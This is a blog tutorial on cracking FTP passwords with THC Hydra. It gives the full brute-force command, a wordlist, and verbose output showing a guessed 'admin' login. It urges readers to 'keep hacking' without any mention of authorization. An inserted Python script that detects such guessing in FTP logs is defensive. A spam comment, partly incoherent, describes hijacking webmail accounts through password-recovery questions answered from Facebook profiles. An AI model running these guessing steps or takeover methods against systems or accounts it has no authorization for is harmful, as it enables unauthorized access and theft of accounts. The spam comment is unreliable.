Never Ending Security

It starts all here

Crack ftp passwords with thc hydra – tutorial

Brute force password cracking

Hydra is a popular password cracking tool that can be used to brute force many services to find the login password from a given wordlist. It is included in Kali Linux and is in the top 10 list. On Ubuntu it can be installed from the Synaptic package manager.

For brute forcing, Hydra needs a list of passwords. There are lots of password lists available. In this example we are going to use the default password list provided with John the Ripper, which is another password cracking tool. Another password list is available at dazzlepod.

John is pre-installed on Kali Linux and its password list can be found at the following location


It looks like this

#!comment: This list has been compiled by Solar Designer of Openwall Project,
#!comment: This list is based on passwords most commonly seen on a set of Unix
#!comment: systems in mid-1990's, sorted for decreasing number of occurrences
#!comment: (that is, more common passwords are listed first).  It has been
#!comment: revised to also include common website passwords from public lists
#!comment: of "top N passwords" from major community website compromises that
#!comment: occurred in 2006 through 2010.
#!comment: Last update: 2011/11/20 (3546 entries)

Copy that file to your desktop or any other location and remove the comment lines (all the lines above the password 123456). Now our wordlist of passwords is ready, and we are going to use it to brute force an FTP server to try to crack its password.

Here is the simple command with output

root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV ftp
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra ( starting at 2013-05-13 04:32:18
[DATA] 1 task, 1 server, 3546 login tries (l:1/p:3546), ~3546 tries per task
[DATA] attacking service ftp on port 21
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target - login "admin" - pass "123456" - 1 of 3546 [child 0]
[ATTEMPT] target - login "admin" - pass "12345" - 2 of 3546 [child 0]
[ATTEMPT] target - login "admin" - pass "password" - 3 of 3546 [child 0]
[21][ftp] host:   login: admin   password: password
[STATUS] attack finished for (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2013-05-13 04:32:33

Check the line “[21][ftp]”. It shows the username/password combination that worked for the FTP server. Quite easy!

Now let's take a look at the options. The “t” option sets how many parallel threads Hydra should create. In this case I used 1 because many routers cannot handle multiple connections and would freeze or hang for a short while. To avoid this, it's better to do 1 attempt at a time. The next option is “l”, which gives the username or login to use. In this case it's admin. Next comes the capital “P” option, which provides the wordlist to use. Hydra will pick up each line as a single password and use it.

The “v” option is for verbose and the capital “V” option is for showing every password being tried. Last comes the host/ip address followed by the service to crack.
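Seen from the server side, a run like the one above leaves one failed-login record per guess, even at one attempt at a time. The following is an added example, not part of the original tutorial: it scans FTP login records for a run of failures from one client and for a successful login that follows such a run. The vsftpd-style line layout, the threshold, the window and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# vsftpd-style login records; the exact layout is an assumption of this example.
LINE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<res>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def detect(lines, threshold=3, window=timedelta(seconds=60)):
    """Return (alert, client, user) tuples for guessing runs and for any
    successful login that directly follows one from the same client."""
    fails = defaultdict(deque)              # client -> recent failure times
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue                        # not a login record
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        recent = fails[m["ip"]]
        while recent and ts - recent[0] > window:
            recent.popleft()                # drop failures outside the window
        if m["res"] == "FAIL":
            recent.append(ts)
            if len(recent) == threshold:    # alert once when the run is reached
                alerts.append(("password_guessing", m["ip"], m["user"]))
        else:
            if len(recent) >= threshold:    # a guess may have succeeded
                alerts.append(("login_after_guessing", m["ip"], m["user"]))
            recent.clear()
    return alerts

# Constructed sample log: documentation addresses and invented users.
SAMPLE = """\
Tue Jan  2 10:00:01 2024 [pid 2] [admin] FAIL LOGIN: Client "192.0.2.10"
Tue Jan  2 10:00:04 2024 [pid 2] [admin] FAIL LOGIN: Client "192.0.2.10"
Tue Jan  2 10:00:05 2024 [pid 2] [alice] FAIL LOGIN: Client "198.51.100.7"
Tue Jan  2 10:00:07 2024 [pid 2] [admin] FAIL LOGIN: Client "192.0.2.10"
Tue Jan  2 10:00:11 2024 [pid 2] [alice] OK LOGIN: Client "198.51.100.7"
Tue Jan  2 10:00:15 2024 [pid 2] [admin] OK LOGIN: Client "192.0.2.10"
""".splitlines()

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(*alert)
```

A single mistyped password followed by a good login (the alice lines) raises nothing, while the admin run raises both alerts. Guessing spaced wider than the window stays under a count-based rule like this one, so it complements account lockout or connection rate limiting on the server rather than replacing them.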

Brute forcing is the most basic form of password cracking. It works well with devices like routers, which are mostly configured with their default passwords. However, when it comes to other systems, brute forcing will not work unless you are very lucky.

Still, brute forcing is good practice for hackers, so you should keep trying all techniques to hack a system. So keep hacking!!


One response to “Crack ftp passwords with thc hydra – tutorial”

  1. how to hack facebook account 17 May 2015 at 12:47

    Sometimes you may forget to log out safely
    and this can be a very hard thing to do. Bronk used an obvious,
    but clever method to hack into the women’s accounts:
    since Webmail accounts have password recovery schemes that could be bypassed
    using information from Facebook profiles, such as favorite foods, high-school
    mascots, favorite colors, and so on, once he obtained that information, he would try to hack into an account.
    Call of Duty online games allow players to leap in and out of matches already in progress.
